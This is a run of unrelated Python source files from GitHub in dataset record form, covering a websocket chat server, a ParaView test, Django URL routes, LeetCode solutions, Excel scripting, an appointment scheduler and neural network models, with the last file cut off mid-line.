'chat_message_received'\n if curr_client_id == client_id:\n # ::before\n # new_key = generate_new_private_key()\n # server_private_keys[curr_client_id] = new_key\n e_private, n_private = encode_public_keynumbers(private_key.public_key().public_numbers())\n message_data['e'] = e_private\n message_data['n'] = n_private\n event_type = 'my_chat_message_received'\n\n server.send_message(\n curr_client,\n format_message(\n event_type,\n message_data,\n message_blocks_encrypted\n )\n )\n\n\ndef on_client_left_chat(client, msg):\n client_id = client['id']\n if client_id in usernames:\n username = usernames[client_id]\n\n server.send_message_to_all(\n format_message(\n 'client_left_chat',\n {\n 'username': username\n }\n )\n )\n\n del usernames[client_id]\n if client_id in client_public_keys:\n del client_public_keys[client_id]\n if client_id in server_private_keys:\n del server_private_keys[client_id]\n\n\nhandlers = {\n \"check_username\": on_check_username,\n \"register\": on_register,\n \"chat_message\": on_chat_message,\n \"client_left_chat\": on_client_left_chat\n}\n\n\ndef generate_keys():\n while True:\n lock = threading.Lock()\n lock.acquire()\n print(\"Lock acquired.\")\n for client_id in usernames.keys():\n prk = generate_new_private_key()\n server_new_private_keys[client_id] = prk\n lock.release()\n print(\"Lock released.\")\n sleep(30)\n\n\nkey_generator_thread = threading.Thread(target=generate_keys)\nkey_generator_thread.daemon = True\nkey_generator_thread.start()\n\nserver = WebsocketServer(5000, host='127.0.0.1', loglevel=logging.DEBUG)\nserver.set_fn_new_client(on_new_client)\nserver.set_fn_message_received(on_message)\nserver.set_fn_client_left(on_client_left_chat)\nserver.run_forever()\n","repo_name":"max810/RSA-emx","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36876983390","text":"#### Verify that Merge Blocks produces polydata output when inputs are polydata\nfrom paraview.simple import *\nfrom paraview import servermanager as sm\nfrom paraview import smtesting\nimport os;\n\n# This test makes sure that the GMV reader can read vertices and lines.\n\nsmtesting.ProcessCommandLineArguments()\n\nGMVDir = os.path.join(smtesting.DataDir, \"Plugins\", \"GMVReader\", \"Testing\", \"Data\", \"GMV\")\n\n# load plugin\nLoadDistributedPlugin('GMVReader', ns=globals())\n\n# create a new 'GMV Reader'\none_vertexgmv = GMVReader(registrationName='one_vertex.gmv',\n FileNames=[os.path.join(GMVDir, \"one_vertex.gmv\")])\none_vertexgmv.CellArrayStatus = ['material id']\n\nassert(sm.Fetch(one_vertexgmv).GetBlock(1).GetNumberOfVerts() == 3)\n\n# create a new 'GMV Reader'\ntwo_vertexgmv = GMVReader(registrationName='two_vertex.gmv',\n FileNames=[os.path.join(GMVDir, \"two_vertex.gmv\")])\ntwo_vertexgmv.CellArrayStatus = ['material id']\n\nassert(sm.Fetch(two_vertexgmv).GetBlock(1).GetNumberOfLines() == 2)\n","repo_name":"Kitware/ParaView","sub_path":"Plugins/GMVReader/Testing/Python/GMVReaderOneOrTwoVertices.py","file_name":"GMVReaderOneOrTwoVertices.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":1099,"dataset":"github-code","pt":"77"} +{"seq_id":"1740628338","text":"from distutils.core import setup\nfrom distutils.extension import Extension\nfrom Cython.Build import cythonize\n\n\nhashmodule_extensions = [\n Extension(\n name=\"lackeyhash\",\n sources=[\"pylackeyhash.pyx\", \"src/lackeyhash.c\"],\n library_dirs=[\"src\"],\n include_dirs=[\"src\"],\n )\n]\n\nsetup(\n name=\"lackeyhash\",\n version=\"0.1.0\",\n description=\"Custom hash function used by LackeyCCG.\",\n long_description=\"Reimplementation of Lackey's file hashing routine in C as a python module.\",\n author=\"Dan Peavey\",\n author_email=\"danpeavey@gmail.com\",\n url=\"https://github.com/sunmachine/lackeyhasher/\",\n ext_modules=cythonize(hashmodule_extensions, language_level=\"3\"),\n)\n","repo_name":"sunmachine/lackeyhasher","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72831856569","text":"\"\"\"djangle forum URL Configuration\n\nThe `urlpatterns` list routes URLs to views.\n\"\"\"\nfrom django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^create/board/$', views.create_board, name='create_board'),\n url(r'^create/moderation/(?P\\d*)/?$', views.manage_user_mod, name='edit_mod'),\n url(r'^create/boardmoderation/(?P\\w+)/?$', views.manage_board_mod, name='board_mod'),\n url(r'^create/thread/$', views.create_thread, name='create_thread'),\n url(r'^board/(?P\\w+)/(?P\\d*)/?$', views.board_view, name='board'),\n url(r'^thread/(?P\\d+)/(?P\\d*)/?$', views.thread_view, name='thread'),\n url(r'^post/(?P\\d+)/(?Pup)/?$', views.vote_view, name='pos_vote'),\n url(r'^post/(?P\\d+)/(?Pdown)/?$', views.vote_view, name='neg_vote'),\n url(r'^profile/(?P[\\w\\+\\-@_\\.]+)/$', views.profile, name='profile'),\n url(r'^edit/profile/$', views.edit_profile, name='edit_profile'),\n url(r'^edit/profile/(?Pfirst_name)/$', views.reset_user_field, name='reset_first_name'),\n url(r'^edit/profile/(?Plast_name)/$', views.reset_user_field, name='reset_last_name'),\n url(r'^edit/profile/(?Pavatar)/$', views.reset_user_field, name='reset_avatar'),\n url(r'^post/(?P\\d+)/delete/$', views.del_post, name='del_post'),\n url(r'^comment/post/(?P\\d+)/$', views.comment, name='comment'),\n url(r'^comment/(?P\\d+)/delete/$', views.del_comment, name='del_comment'),\n url(r'^thread/(?P\\d+)/subscribe/$', views.subscribe, name='subscribe'),\n url(r'^thread/(?P\\d+)/unsubscribe/$', views.unsubscribe, name='unsubscribe'),\n url(r'^thread/(?P\\d+)/close/$', views.toggle_close_thread, name='toggle_close_thread'),\n url(r'^thread/(?P\\d+)/stick/$', views.stick_thread, name='stick_thread'),\n url(r'^tag/(?P\\w+)/(?P\\d*)/?$', views.tag_view, name='tag'),\n url(r'^manage/supermods/$', views.manage_supermods, name='supermods'),\n url(r'^manage/supermods/toggle/(?P\\d+)/$', views.supermod_toggle, name='supermod_toggle'),\n url(r'^manage/moderators/$', views.moderators_view, name='moderators'),\n url(r'^remove/moderation/(?P\\d+)/(?P\\w+)', views.remove_mod, name='remove_mod'),\n url(r'^manage/ban/(?P\\d+)/$', views.ban_user, name='ban_user'),\n url(r'^manage/unban/(?P\\d+)/$', views.unban_user, name='unban_user'),\n url(r'^search/(?P\\d*)/?$', views.search, name='search'),\n url(r'^search/new/$', views.new_search, name='new_search')\n]\n","repo_name":"donkeyxote/djangle","sub_path":"djangle/forum/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33618884912","text":"'''\r\nRealizar una función separar() que tome una lista de números enteros y devuelva dos listas ordenadas. \r\nLa primera con los números pares, y la segunda con los números impares\r\nPara la solución de este problema, se requiere que el usuario \r\nescriba un script y defina una función llamada separar(). \r\nComo parámetro de entrada recibe una lista de numero de enteros. \r\nLa lista debe crearla como lista=[1,2,3,4]. La función devuelve \r\ndos listas de la forma: lista1=[Numeros pares], \r\nlista2=[numeros impares]\r\n'''\r\nnum = [-12, 84, 13, 20, -33, 101, 9]\r\ndef separar(lista): #Establecer la función\r\n num.sort() # Función Sort organiza\r\n pares = []\r\n impares = []\r\n for n in num:\r\n if n%2 == 0:\r\n pares.append(n) # Función Append agrega al final de la lista \r\n else:\r\n impares.append(n) \r\n return pares, impares\r\n\r\npares, impares = separar(num)\r\nprint(pares)\r\nprint(impares)","repo_name":"keren-sofia/manejo_de_funciones","sub_path":"Ejer. Manejo de funciones.py","file_name":"Ejer. Manejo de funciones.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14991444715","text":"# 835. Image Overlap\n# 🟠 Medium\n#\n# https://leetcode.com/problems/image-overlap/\n#\n# Tags: Array - Matrix\n\nimport timeit\nfrom collections import Counter, defaultdict\nfrom typing import List\n\n\n# Store all positions that hold 1s in each matrix in a list. Then\n# iterate over each combination of positions in the list computing the\n# vector between them and adding 1 to the count of times that we have\n# seen the given vector. The solution to the problem will come from\n# shifting the matrix using the most common vector and it will equal the\n# number of positions in a and b that have that vector in common.\n#\n# Time complexity: O(n^4) - In the worst case each position in both\n# matrixes would have a 1 O(n^2) and we would check each combination of\n# them O((n^2)*(n^2)).\n# Space complexity: O(n^2) - Either list and also the dictionary could\n# grow to size n*n.\n#\n# Runtime: 938 ms, faster than 59.65%\n# Memory Usage: 14.6 MB, less than 43.86%\nclass VectorCounts:\n def largestOverlap(\n self, img1: List[List[int]], img2: List[List[int]]\n ) -> int:\n # Store the length of both of the matrixes height and width.\n N = len(img1)\n # Store all positions that have a 1 in a and b.\n ones_in_a, ones_in_b = [], []\n for i in range(N):\n for j in range(N):\n if img1[i][j]:\n ones_in_a.append((i, j))\n if img2[i][j]:\n ones_in_b.append((i, j))\n # Store a dictionary of vectors pointing to the number of times\n # we have seen that exact vector between two ones.\n count = defaultdict(int)\n # Store the highest count of matching vectors seen so far.\n res = 0\n for a_cell in ones_in_a:\n for b_cell in ones_in_b:\n vector = (b_cell[0] - a_cell[0], b_cell[1] - a_cell[1])\n count[vector] += 1\n if count[vector] > res:\n res = count[vector]\n return res\n\n\n# There is an interesting solution that flattens the positions with ones\n# in both matrixes into lists and then checks their difference, the\n# concept is similar to the previous solution but I thought that it was\n# interesting enough to add it here.\n#\n# The original post is at:\n# https://leetcode.com/problems/image-overlap/discuss/130623/C%2B%2BJavaPython-Straight-Forward\n#\n# Time complexity: O(N^4) - The original post gives it as O(AB + N^2)\n# with A and B the number of 1s in A and B, as the number of 1s grows in\n# the matrixes, A*B approaches n^4.\n# Space complexity: O(n^2) - The original post gives it as O(A+B) which\n# becomes O(n^2) when the entire matrix is made of 1s.\n#\n# Runtime: 567 ms, faster than 86.55%\n# Memory Usage: 14.4 MB, less than 64.33%\nclass FlattenMatrix:\n def largestOverlap(\n self, img1: List[List[int]], img2: List[List[int]]\n ) -> int:\n N = len(img1)\n NN = N * N\n la = [i // N * 100 + i % N for i in range(NN) if img1[i // N][i % N]]\n lb = [i // N * 100 + i % N for i in range(NN) if img2[i // N][i % N]]\n c = Counter(i - j for i in la for j in lb)\n return max(c.values() or [0])\n\n\ndef test():\n executors = [\n VectorCounts,\n FlattenMatrix,\n ]\n tests = [\n [[[0]], [[0]], 0],\n [[[1]], [[1]], 1],\n [\n [[1, 1, 0], [0, 1, 0], [0, 1, 0]],\n [[0, 0, 0], [0, 1, 1], [0, 0, 1]],\n 3,\n ],\n ]\n for executor in executors:\n start = timeit.default_timer()\n for _ in range(1):\n for col, t in enumerate(tests):\n sol = executor()\n result = sol.largestOverlap(t[0], t[1])\n exp = t[2]\n assert result == exp, (\n f\"\\033[93m» {result} <> {exp}\\033[91m for\"\n + f\" test {col} using \\033[1m{executor.__name__}\"\n )\n stop = timeit.default_timer()\n used = str(round(stop - start, 5))\n cols = \"{0:20}{1:10}{2:10}\"\n res = cols.format(executor.__name__, used, \"seconds\")\n print(f\"\\033[92m» {res}\\033[0m\")\n\n\ntest()\n","repo_name":"raul-sauco/coding-challenges","sub_path":"leetcode/image-overlap.py","file_name":"image-overlap.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"43816804032","text":"import collections, heapq\nclass Solution:\n \"\"\"\n You are given a network of n nodes, labeled from 1 to n. You are also given times, a list of travel times as directed edges times[i] = (ui, vi, wi), where ui\n is the source node, vi is the target node, and wi is the time it takes for a signal to travel from source to target.\n We will send a signal from a given node k. Return the minimum time it takes for all the n nodes to receive the signal. \n If it is impossible for all the n nodes to receive the signal, return -1.\n \"\"\"\n def networkDelayTime(self, times: List[List[int]], n: int, k: int) -> int:\n # This problem will require Dijkstra's Algo\n # Create a dictionary of all the nodes, where u is the source node, v is the target, and w is the time taken\n edges = collections.defaultdict(list)\n for u, v, w in times:\n edges[u].append((v, w))\n # Create a minHeap to store min edges, and create a visited set\n minHeap = [(0, k)]\n visit = set()\n # Initialize the time\n t = 0\n # We will run BFS, so while the heap still has elements \n while minHeap:\n # Pop the element in the heap which is closest to the source i.e. the one with the lowest time to reach\n w1, n1, = heapq.heappop(minHeap)\n # If we have already visited this node previously, a quicker path already exists, so go to the next iteration\n if n1 in visit:\n continue\n # Add this node to the visited set\n visit.add(n1)\n # Set t to the time it took to reach this node\n t = w1\n # For every neighbor of this node\n for n2, w2 in edges[n1]:\n # If we haven't already visited the neighbor\n if n2 not in visit:\n # Add this node to the heap, and set the time it takes to reach this node as (time it takes to reach n1) + (time to reach n2 from n1)\n heapq.heappush(minHeap, (w1 + w2, n2))\n # Return t if we were able to visit every node and check it via djikstras. If we couldn't reach every node, return -1\n return t if len(visit) == n else -1\n ","repo_name":"aroy105/LeetCode","sub_path":"AdvancedGraphs/743-network_time_delay.py","file_name":"743-network_time_delay.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34812139320","text":"import matplotlib.pyplot as plt\nimport os\n\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom prompt_toolkit import prompt\nfrom prompt_toolkit.history import InMemoryHistory\n\nfrom wusn.commons import WusnOutput, WusnInput\n\n\nif __name__ == '__main__':\n history = InMemoryHistory()\n plt.ioff()\n\n print('Enter a path to an input/output file to view its plot.')\n print('Ctrl+C or Ctrl+D to exit.')\n\n try:\n while True:\n path = prompt('> ', history=history)\n if not os.path.exists(path):\n print('No such path exists.')\n continue\n\n try:\n if path.endswith('.test'):\n obj = WusnInput.from_file(path)\n else:\n obj = WusnOutput.from_text_file(path)\n except Exception:\n print('Failed to open file.')\n continue\n\n fig = plt.figure()\n ax = Axes3D(fig)\n obj.plot(ax, highlight_max=False)\n ax.legend()\n plt.show()\n fig.clf()\n\n except (KeyboardInterrupt, EOFError):\n print()\n","repo_name":"lanPN85/wusn","sub_path":"interactive_plot.py","file_name":"interactive_plot.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"11878972033","text":"from multiprocessing import Process\nfrom datetime import datetime\n\nfrom .appointments import start_appointment_job\n\nfrom services.appointments import get_appointments\n\nWORKERS = {}\n\n\ndef terminate_worker(worker):\n try:\n worker.terminate()\n worker.join()\n worker.close()\n except Exception as err:\n print('====> Error occurred terminating process', err)\n\n\ndef schedule_appointment(appointment):\n appointment_id = str(appointment['_id'])\n worker = Process(target=start_appointment_job, args=(appointment,))\n worker.start()\n WORKERS[appointment_id] = worker\n\n\ndef update_scheduled_appointment(appointment_id, updated_appt):\n worker = WORKERS[appointment_id]\n terminate_worker(worker)\n new_worker = Process(target=start_appointment_job, args=(updated_appt,))\n new_worker.start()\n WORKERS[appointment_id] = new_worker\n\n\ndef delete_scheduled_appointment(appointment_id):\n worker = WORKERS[appointment_id]\n terminate_worker(worker)\n del WORKERS[appointment_id]\n\n\ndef init_workers():\n print('=====> Initializing workers')\n appts = get_appointments({})\n for appt in appts:\n if datetime.now() > appt['time']:\n continue\n schedule_appointment(appt)\n\n\ndef close_workers():\n for appointment_id, worker in WORKERS.items():\n terminate_worker(worker)\n","repo_name":"Favouroked/twilio_appointments","sub_path":"jobs/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40954808191","text":"from __future__ import absolute_import\n\n# Built-in modules\nimport abc\n\n# Third party modules\n\n# Own modules\nfrom microprobe.exceptions import MicroprobeArchitectureDefinitionError\nfrom microprobe.utils.imp import find_subclasses\nfrom microprobe.utils.logger import get_logger\nfrom microprobe.utils.typeguard_decorator import typeguard_testsuite\n\n# Constants\nLOG = get_logger(__name__)\n__all__ = [\"import_classes_from\", \"Comparator\"]\n\n\n# Functions\n@typeguard_testsuite\ndef import_classes_from(modules):\n \"\"\"\n\n :param modules:\n\n \"\"\"\n\n LOG.info(\"Start\")\n classes = {}\n\n for module_str in modules:\n for cls in find_subclasses(module_str, Comparator):\n\n name = cls.__name__\n if name in classes:\n raise MicroprobeArchitectureDefinitionError(\n \"Duplicated \"\n \"definition\"\n \" of Comparator '%s' \"\n \"in module '%s'\" % (name, module_str))\n LOG.info(\"%s comparator imported\", name)\n classes[name] = cls\n\n if len(classes) == 0:\n LOG.warning(\"No comparators imported.\")\n\n LOG.info(\"End\")\n return list(classes.values())\n\n\n# Classes\n@typeguard_testsuite\nclass Comparator(object, metaclass=abc.ABCMeta):\n \"\"\"Abstract class to perform comparisons. :class:`~.Comparator`\n objects are in charge of performing comparisons between values\n while providing an architecture independent and modular interface.\n They are registered in an :class:`~.ISA` object using the\n :meth:`~.ISA.register_value_comparator`.\n Once registered, whenever a comparison is needed to perform a\n given operation, it is possible to check (:meth:`check`) if\n the :class:`~.Comparator` can perform the requested comparison,\n and if so, it can generate (:meth:`generate`) the required\n :class:`~.list` of :class:`~.Instruction` to perform it.\n\n :param isa: Architecture to operate on.\n\n \"\"\"\n\n def __init__(self, arch):\n \"\"\"\n\n :param arch:\n\n \"\"\"\n self._arch = arch\n\n @abc.abstractmethod\n def check(self, reg, value):\n \"\"\"Checks whether the :class:`~.Register` *reg* instance can\n be compared with the *value*, which can be a ::class:`~.int` or another\n :class:`~.Register`. If is not possible to perform the\n comparison, a `None` value is returned. Otherwise, the\n :class:`~.Register` instance where the result of the\n comparison would be placed is returned.\n\n :param reg: 1st operand of the comparison.\n :type reg: :class:`~.Register`\n :param value: 2nd operand of the comparison.\n :type value: :class:`~.Register` or ::class:`~.int`\n\n \"\"\"\n raise NotImplementedError\n\n @abc.abstractmethod\n def generate(self, reg, value, helper_instr):\n \"\"\"Generate the :class:`~.Instruction` to perform\n the comparison. If the required instruction is found within\n the :class:`~.list` of :class:`~.Instruction`\n *helper_instr*, no new instruction is generated and the matching\n instruction operands are set accordingly.\n\n :param reg: 1st operand of the comparison.\n :type reg: :class:`~.Register`\n :param value: 2nd operand of the comparison.\n :type value: :class:`~.Register` or ::class:`~.int`\n :param helper_instr: List of helper instructions.\n :type helper_instr: :class:`~.list` of :class`~.Instruction`\n instances.\n\n \"\"\"\n raise NotImplementedError\n\n @property\n @abc.abstractmethod\n def instr_name(self):\n \"\"\"Value comparator name, usually the opcode of the instruction it\n uses (:class:`~.str`).\n\n\n \"\"\"\n raise NotImplementedError\n\n @property\n def arch(self):\n \"\"\"Architecture on this :class:`~.Comparator` will work on\n (:class:`~.ISA`).\n\n\n \"\"\"\n return self._arch\n","repo_name":"IBM/microprobe","sub_path":"src/microprobe/target/isa/comparator.py","file_name":"comparator.py","file_ext":"py","file_size_in_byte":3924,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"77"} +{"seq_id":"8808912757","text":"import openpyxl\nwb = openpyxl.Workbook()\nx = wb.get_sheet_names()\nprint(x)\n# rename sheet\nsheet = wb.active\nsheet.title = 'Sapm Bacon Eggs Sheet'\nx = wb.get_sheet_names()\nprint(x)\n# create sheet\nwb.create_sheet(index=0, title='First Sheet')\nwb.create_sheet(index=2, title='Middle Sheet')\nx = wb.get_sheet_names()\nprint(x)\n# remove sheet\nwb.remove_sheet(wb.get_sheet_by_name('First Sheet'))\nwb.remove_sheet(wb.get_sheet_by_name('Middle Sheet'))\nx = wb.get_sheet_names()\nprint(x)\n# insert data to cell\nsheet = wb.get_sheet_by_name('Sapm Bacon Eggs Sheet')\nsheet['A1'] = 'Hello World!'\ny = sheet['A1'].value\nprint(y)\n# Setup font\nfrom openpyxl.styles import Font\nfontStyle = Font(sz=24, i=True)\nsheet['A2'] = 'Hello World!'\nsheet['A2'].font = fontStyle\n# 設定列高與欄寬\nsheet.row_dimensions[1].height = 70\nsheet.column_dimensions['A'].width = 30\nsheet.column_dimensions['B'].width = 0.5\n# Merge Cell\nsheet.merge_cells('A1:C1')\nsheet['A1'] = 'Cells merged together.'\nsheet.merge_cells('A2:C5')\nsheet['A2'] = 'Cells merged together.'\n# Unmerge Cell\nsheet.unmerge_cells('A2:C5')\n# Freeze Panes\nsheet.freeze_panes = 'A2'\n# save file\nwb.save('example_copy.xlsx')\n\n","repo_name":"purplvampire/coding2","sub_path":"excel2.py","file_name":"excel2.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23048874301","text":"import tensorflow as tf\r\nimport os\r\n\r\nfrom time import gmtime, strftime\r\nfrom dataset import *\r\nfrom run import train, train_vae\r\nfrom model import NameGeneration\r\nfrom vae import VAE\r\n\r\n\r\nflags = tf.app.flags\r\nflags.DEFINE_integer(\"vae_epoch\", 30, \"Epoch to train\")\r\nflags.DEFINE_integer(\"ae_epoch\", 500, \"Epoch to train\")\r\nflags.DEFINE_integer(\"gan_epoch\", 10000, \"Epoch to train\")\r\nflags.DEFINE_integer(\"input_dim\", 43, \"Data input dimension + PAD, GO, EOS\")\r\nflags.DEFINE_integer(\"class_dim\", 127, \"Data class dimension\")\r\nflags.DEFINE_integer(\"latent_dim\", 30, \"Latent variable dimenstion\")\r\nflags.DEFINE_integer(\"batch_size\", 1000, \"Mini-batch size\")\r\nflags.DEFINE_integer(\"max_time_step\", 45, \"Maximum time step of RNN\")\r\nflags.DEFINE_integer(\"min_grad\", -10, \"Minimum gradient to clip\")\r\nflags.DEFINE_integer(\"max_grad\", 10, \"Maximum gradient to clip\")\r\nflags.DEFINE_integer(\"cell_dim\", 200, \"Dimension of RNN cell\")\r\nflags.DEFINE_integer(\"cell_layer_num\", 1, \"The layer number of RNN \")\r\nflags.DEFINE_integer(\"char_dim\", 50, \"Dimension of character embedding\")\r\nflags.DEFINE_integer(\"hidden_dim\", 200, \"Dimension of hidden layer for FFNN\")\r\nflags.DEFINE_float(\"ae_lr\", 5e-3, \"Learning rate of autoencoder\")\r\nflags.DEFINE_float(\"vae_lr\", 1e-2, \"Learning rate of variational autoencoder\")\r\nflags.DEFINE_float(\"cf_lr\", 1e-3, \"Learning rate of classifier\")\r\nflags.DEFINE_float(\"gan_lr\", 1e-3, \"Learning rate of GAN\")\r\nflags.DEFINE_float(\"output_dr\", 0.5, \"Dropout rate of FFNN\")\r\nflags.DEFINE_float(\"cell_keep_prob\", 0.5, \"Keep prob of RNN cell dropout\")\r\nflags.DEFINE_string(\"checkpoint_dir\", \"checkpoint\", \"Directory name to save the checkpoints\")\r\nflags.DEFINE_string(\"results_dir\", \"results\", \"Directory name to save the results\")\r\nflags.DEFINE_string(\"data_dir\", \"data\", \"Directory name to save the results\")\r\nflags.DEFINE_boolean(\"conditional\", False, \"True to use conditional generation\")\r\nflags.DEFINE_boolean(\"is_train\", True, \"True for training, False for testing\")\r\nflags.DEFINE_boolean(\"load_autoencoder\", False, \"True to load pretrained autoencoder\")\r\nflags.DEFINE_boolean(\"train_autoencoder\", True, \"True to train autoencoder\")\r\nflags.DEFINE_string(\"pretrained_path\", \"ae_no_class/pretrained_ae\", \"Path of pretrained ae\")\r\nFLAGS = flags.FLAGS\r\n\r\n\r\ndef create_model(config):\r\n scope = 'NameGeneration-' + strftime(\"%Y%m%d%H%M%S\", gmtime())\r\n config.checkpoint_dir += '/%s' % scope\r\n # ng_model = NameGeneration(config, scope=scope)\r\n ng_model = VAE(config, scope=scope)\r\n return ng_model\r\n\r\n\r\ndef main(_):\r\n print(flags.FLAGS.__flags, '\\n')\r\n\r\n dataset = get_name_data(FLAGS)\r\n ng_model = create_model(FLAGS)\r\n if FLAGS.is_train:\r\n # train(ng_model, dataset, FLAGS)\r\n train_vae(ng_model, dataset, FLAGS)\r\n\r\n\r\nif __name__ == '__main__':\r\n if not os.path.exists(FLAGS.results_dir):\r\n os.makedirs(FLAGS.results_dir)\r\n tf.app.run()\r\n\r\n","repo_name":"jhyuklee/namegen-tensorflow","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31136450755","text":"from keras import backend as K\r\nfrom tensorflow.keras.layers import *\r\nfrom tensorflow.keras.models import Model\r\nfrom parameters import *\r\n\r\ndef conv_bn_act(x, filters, drop_out=0.0):\r\n x = Conv2D(filters, (3, 3), activation=None, padding='same')(x)\r\n\r\n if drop_out > 0:\r\n x = Dropout(drop_out)(x)\r\n\r\n x = BatchNormalization()(x)\r\n x = Activation('relu')(x)\r\n\r\n return x\r\n\r\ndef expend_as(x, n):\r\n y = Lambda(lambda x, repnum: K.repeat_elements(x, repnum, axis=3), arguments={'repnum': n})(x)\r\n return y\r\n\r\ndef attention_layer(d, e, n):\r\n d1 = Conv2D(n, (1, 1), activation=None, padding='same')(d)\r\n e1 = Conv2D(n, (1, 1), activation=None, padding='same')(e)\r\n\r\n concat_de = add([d1, e1])\r\n\r\n relu_de = Activation('relu')(concat_de)\r\n conv_de = Conv2D(1, (1, 1), padding='same')(relu_de)\r\n sigmoid_de = Activation('sigmoid')(conv_de)\r\n\r\n shape_e = K.int_shape(e)\r\n upsample_psi = expend_as(sigmoid_de, shape_e[3])\r\n\r\n return multiply([upsample_psi, e])\r\n\r\ndef df_block(x, filters, compression=0.5, drop_out=0.0):\r\n x1 = Conv2D(filters, (3, 3), dilation_rate=2, padding='same')(x)\r\n\r\n if drop_out > 0:\r\n x1 = Dropout(drop_out)(x1)\r\n\r\n x1 = BatchNormalization()(x1)\r\n x1 = Activation('relu')(x1)\r\n\r\n x2 = Conv2D(filters, (3, 3), padding='same')(x)\r\n\r\n if drop_out > 0:\r\n x2 = Dropout(drop_out)(x2)\r\n\r\n x2 = BatchNormalization()(x2)\r\n x2 = Activation('relu')(x2)\r\n\r\n x3 = add([x1, x2])\r\n\r\n x3 = GlobalAveragePooling2D()(x3)\r\n\r\n x3 = Dense(int(filters * compression))(x3)\r\n x3 = BatchNormalization()(x3)\r\n x3 = Activation('relu')(x3)\r\n\r\n x3 = Dense(filters)(x3)\r\n\r\n x3p = Activation('sigmoid')(x3)\r\n\r\n x3m = Lambda(lambda x: 1 - x)(x3p)\r\n\r\n x4 = multiply([x1, x3p])\r\n x5 = multiply([x2, x3m])\r\n\r\n return add([x4, x5])\r\n\r\ndef TB_UNet(input_shape=(IMAGE_SIZE, IMAGE_SIZE, 3), filters=16, compression=0.5, drop_out=0, half_net=False, attention_gates=True):\r\n\r\n inputShape = Input(input_shape)\r\n\r\n c1 = df_block(inputShape, filters, compression=compression, drop_out=drop_out)\r\n c1 = df_block(c1, filters, compression=compression, drop_out=drop_out)\r\n p1 = MaxPooling2D((2, 2))(c1)\r\n filters = 2 * filters\r\n\r\n c2 = df_block(p1, filters, compression=compression, drop_out=drop_out)\r\n c2 = df_block(c2, filters, compression=compression, drop_out=drop_out)\r\n p2 = MaxPooling2D((2, 2))(c2)\r\n filters = 2 * filters\r\n\r\n c3 = df_block(p2, filters, compression=compression, drop_out=drop_out)\r\n c3 = df_block(c3, filters, compression=compression, drop_out=drop_out)\r\n p3 = MaxPooling2D((2, 2))(c3)\r\n filters = 2 * filters\r\n\r\n c4 = df_block(p3, filters, compression=compression, drop_out=drop_out)\r\n c4 = df_block(c4, filters, compression=compression, drop_out=drop_out)\r\n p4 = MaxPooling2D((2, 2))(c4)\r\n filters = 2 * filters\r\n\r\n cm = df_block(p4, filters, compression=compression, drop_out=drop_out)\r\n cm = df_block(cm, filters, compression=compression, drop_out=drop_out)\r\n\r\n filters = filters // 2\r\n\r\n u4 = Conv2DTranspose(filters, (2, 2), strides=(2, 2), padding='same')(cm)\r\n\r\n if attention_gates:\r\n u4 = concatenate([u4, attention_layer(u4, c4, 1)], axis=3)\r\n else:\r\n u4 = concatenate([u4, c4], axis=3)\r\n\r\n if half_net:\r\n c5 = conv_bn_act(u4, filters, drop_out=drop_out)\r\n c5 = conv_bn_act(c5, filters, drop_out=drop_out)\r\n else:\r\n c5 = df_block(u4, filters, compression=compression, drop_out=drop_out)\r\n c5 = df_block(c5, filters, compression=compression, drop_out=drop_out)\r\n\r\n filters = filters // 2\r\n\r\n u3 = Conv2DTranspose(filters, (2, 2), strides=(2, 2), padding='same')(c5)\r\n\r\n if attention_gates:\r\n u3 = concatenate([u3, attention_layer(u3, c3, 1)], axis=3)\r\n else:\r\n u3 = concatenate([u3, c3], axis=3)\r\n\r\n if half_net:\r\n c6 = conv_bn_act(u3, filters, drop_out=drop_out)\r\n c6 = conv_bn_act(c6, filters, drop_out=drop_out)\r\n else:\r\n c6 = df_block(u3, filters, compression=compression, drop_out=drop_out)\r\n c6 = df_block(c6, filters, compression=compression, drop_out=drop_out)\r\n\r\n filters = filters // 2\r\n\r\n u2 = Conv2DTranspose(filters, (2, 2), strides=(2, 2), padding='same')(c6)\r\n\r\n if attention_gates:\r\n u2 = concatenate([u2, attention_layer(u2, c2, 1)], axis=3)\r\n else:\r\n u2 = concatenate([u2, c2], axis=3)\r\n\r\n if half_net:\r\n c7 = conv_bn_act(u2, filters, drop_out=drop_out)\r\n c7 = conv_bn_act(c7, filters, drop_out=drop_out)\r\n\r\n else:\r\n c7 = df_block(u2, filters, compression=compression, drop_out=drop_out)\r\n c7 = df_block(c7, filters, compression=compression, drop_out=drop_out)\r\n\r\n filters = filters // 2\r\n\r\n u1 = Conv2DTranspose(filters, (2, 2), strides=(2, 2), padding='same')(c7)\r\n\r\n if attention_gates:\r\n u1 = concatenate([u1, attention_layer(u1, c1, 1)], 